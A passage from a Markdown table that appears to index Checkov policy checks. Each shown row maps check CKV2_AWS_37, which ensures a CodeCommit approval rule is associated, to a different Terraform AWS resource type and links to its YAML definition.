[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 650 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 651 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 652 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 653 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 654 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 655 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 656 | CKV2_AWS_37 | resource | aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 657 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 658 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 659 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 660 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 661 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 662 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 663 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 664 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 665 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 666 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 667 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 668 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 669 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 670 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 671 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 672 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 673 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 674 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 675 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 676 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 677 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 678 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 679 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 680 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 681 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 682 | CKV2_AWS_37 | resource | aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 683 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 684 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 685 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 686 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 687 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 688 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 689 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 690 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 691 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 692 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 693 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 694 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 695 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 696 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 697 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 698 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 699 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 700 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 701 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 702 | CKV2_AWS_37 | resource | aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 703 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 704 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 705 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 706 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 707 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 708 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 709 | CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 710 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 711 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 712 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 713 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 714 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 715 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 716 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 717 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 718 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 719 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 720 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 721 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 722 | CKV2_AWS_37 | resource | aws_dms_replication_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 723 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 724 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 725 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 726 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 727 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 728 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 729 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 730 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 731 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 732 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 733 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 734 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 735 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 736 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 737 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 738 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 739 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 740 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 741 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 742 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 743 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 744 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 745 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 746 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 747 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 748 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 749 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 750 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 751 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 752 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 753 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 754 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | 